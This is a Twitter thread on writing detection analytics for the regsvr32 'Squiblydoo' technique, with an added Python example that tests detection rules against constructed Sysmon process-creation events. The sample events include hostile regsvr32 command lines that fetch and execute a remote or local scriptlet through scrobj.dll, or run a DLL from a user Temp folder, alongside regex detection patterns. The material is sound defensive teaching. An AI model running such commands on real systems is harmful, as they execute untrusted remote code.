19 tweets, 5 min read
(thread) One of the things we talked about on the @redcanaryco @CarbonBlack_Inc @MITREattack webinar today was how to start with one attack and use that to build a stronger defensive program.
But people also ask, how do I even start with one analytic? Well, here's one approach. I don't want to repeat the webinar, so let's use an ATT&CK technique as an example: attack.mitre.org/techniques/T11…
How do you build an analytic for that? Where do you even start?
Well, first, you need to understand the attack and how it's used by adversaries. Use the ATT&CK page to do that. Dig into some of the reports it cites and search for the relevant part and what immediately surrounds it.
Then, abstract that out to a set of general patterns for how the attack can work. Atomic Red Team from @redcanaryco can be a good start. github.com/redcanaryco/at…
In this case, you can see the general patterns: the Squiblydoo attack (h/t @subtee), non-HTTP-based scriptlet execution, and executing malicious DLLs directly.
You'll definitely want to execute those attacks yourself! Use your lab environment, download some VMs and try it at home, do something. This doesn't mean being a red-teamer but it does mean understanding what a red-teamer does at that step.
Don't have a lab yet? Try github.com/clong/Detectio… or even just a Windows VM with Splunk free, ELK, or some other SIEM and Sysmon (though note standalone test VMs won't get you certain things in particular for lateral movement and credential access)
After carrying out the attack, see what it looks like in the logs. Figure out what event IDs you need, whether Sysmon is necessary, or whether your EDR can see the behavior. Threat Hunter Playbook is a great resource: github.com/Cyb3rWard0g/Th…
Then just write a search that you know will catch the attack. In software dev, this is called red/green/refactor. You have a failing test (attack that gets through) -- turn it green by writing a detection.
In this case, you probably want to look at process creations for regsvr32.exe and examine the command line. How do I know? Because that's what shows up in the logs when you execute the attack (also, the threat hunter playbook told me).
Next, refactor. Try the attack in a slightly different way until your search "fails" to catch it. Tune the query or add more queries to make sure you can still catch it. Here, the ATT&CK page and Atomic Red Team should give you some ideas. As can your red team friends.
Then introduce some noise. You'll need to try this on the production network that you want it to run on, or you'll be shocked by just how many false positives you can generate! Run those searches and filter out events until what remains is mostly true positives at a volume you can actually review.
In this case, Squiblydoo is likely pretty distinctive but the more generic execution might be tough to identify without doing some baselining/stacking (meaning, manually look for anomalies that seem weird in your env)
Look at filtering by different aspects of the data. When it's bad, does it always have certain command-line arguments? Is it followed by other distinct events (e.g., network traffic)? ThreatHunter-Playbook may give you some ideas here.
In this case, do you see any legitimate usage of regsvr32 accessing the internet?
Then just keep going and going until you have a set of searches that detect the bad and very little good.
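As an added example (not code from the thread, nor from Atomic Red Team or the Threat Hunter Playbook), here is the red/green/refactor loop from the steps above run in Python over constructed Sysmon Event ID 1 records instead of a SIEM query. The events, their "label" and "malicious" annotations, the field subset and the hostnames are all constructed for illustration; the command lines mirror the regsvr32 variants the thread names (Squiblydoo with scrobj.dll, a local scriptlet, direct DLL execution) plus two benign registrations standing in for production noise. rule_v1 is the first "green" search, rule_v2 is the refactored one, and stack_parents is a tiny stand-in for the baselining/stacking step.

```python
import re
from collections import Counter

# Constructed Sysmon Event ID 1 (process creation) records, trimmed to the
# fields the searches use. "label" and "malicious" are our annotations, not
# Sysmon fields; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Squiblydoo: scriptlet fetched over HTTPS and executed via scrobj.dll
    {"label": "squiblydoo_remote", "malicious": True,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /u /i:https://example.invalid/payload.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Non-HTTP variant: local .sct file, same scrobj.dll host
    {"label": "squiblydoo_local", "malicious": True,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /u /i:C:\Users\Public\payload.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Same attack with mixed case and extra whitespace: makes the first search "fail"
    {"label": "squiblydoo_case", "malicious": True,
     "Image": r"C:\Windows\SysWOW64\REGSVR32.EXE",
     "CommandLine": r"REGSVR32.EXE  /S /U /I:HTTPS://EXAMPLE.INVALID/A.SCT SCROBJ.DLL",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Direct execution of an attacker DLL dropped in a user-writable path
    {"label": "dll_user_dir", "malicious": True,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\AllTheThings.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign noise: a vendor installer registering its own COM DLL
    {"label": "benign_install", "malicious": False,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files (x86)\Vendor\vendor.dll"',
     "ParentImage": r"C:\Program Files (x86)\Vendor\setup.exe"},
    # Benign noise: Windows servicing re-registering a system DLL
    {"label": "benign_system", "malicious": False,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml6.dll",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]


def is_regsvr32(event):
    """The thread's starting point: process creations whose image is regsvr32.exe."""
    return event["Image"].lower().endswith("\\regsvr32.exe")


def rule_v1(event):
    """Red -> green: the first search that catches the attack exactly as we ran it."""
    return is_regsvr32(event) and "scrobj.dll" in event["CommandLine"]


# Refactor: case-insensitive, /i: pointing at a remote scriptlet (http, https,
# ftp or a UNC path), plus DLLs registered from user-writable locations.
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?://|ftp://|\\\\)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"(\\Users\\|\\ProgramData\\|\\Temp\\|\\Windows\\Tasks\\)", re.IGNORECASE)
TRUSTED_DLL_DIR = re.compile(r"(\\Windows\\System32\\|\\Windows\\SysWOW64\\|\\Program Files)", re.IGNORECASE)


def rule_v2(event):
    """Refactored search: still catches the v1 cases, plus the variants v1 missed,
    while leaving DLL registrations from trusted install paths alone."""
    if not is_regsvr32(event):
        return False
    cl = event["CommandLine"]
    if SCROBJ.search(cl) or REMOTE_SCRIPTLET.search(cl):
        return True
    # Direct DLL execution is only suspicious from a user-writable path; this is
    # where production baselining decides which paths count as trusted.
    return bool(USER_WRITABLE.search(cl)) and not TRUSTED_DLL_DIR.search(cl)


def evaluate(rule, events=SAMPLE_EVENTS):
    """Return (true_positives, false_positives, false_negatives) as sets of labels."""
    hits = {e["label"] for e in events if rule(e)}
    bad = {e["label"] for e in events if e["malicious"]}
    return hits & bad, hits - bad, bad - hits


def stack_parents(events=SAMPLE_EVENTS):
    """Baselining/stacking stand-in: how often does each parent launch regsvr32?"""
    return Counter(e["ParentImage"].rsplit("\\", 1)[-1].lower()
                   for e in events if is_regsvr32(e))


if __name__ == "__main__":
    for name, rule in (("v1", rule_v1), ("v2", rule_v2)):
        tp, fp, fn = evaluate(rule)
        print(f"{name}: TP={sorted(tp)} FP={sorted(fp)} FN={sorted(fn)}")
    print("regsvr32 launches by parent:", dict(stack_parents()))
```

Running it shows rule_v1 going green on the two cases it was written against and red on the mixed-case and direct-DLL variants; rule_v2 catches all four without flagging the two benign registrations. On a real network the USER_WRITABLE and TRUSTED_DLL_DIR lists are exactly the part you would tune against your own baseline, and the parent-process stack is the kind of column to pivot on when the generic regsvr32 volume is too noisy.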
And don't forget, it might be done already! Check out car.mitre.org, github.com/Neo23x0/sigma, eqllib.readthedocs.io/en/latest/anal…. They might also be inspiration for you to pivot off of.
Well that thread kind of got away from me but there you go. Eventually I'll blog on this with more links and screenshots.
Thread by John Wunder.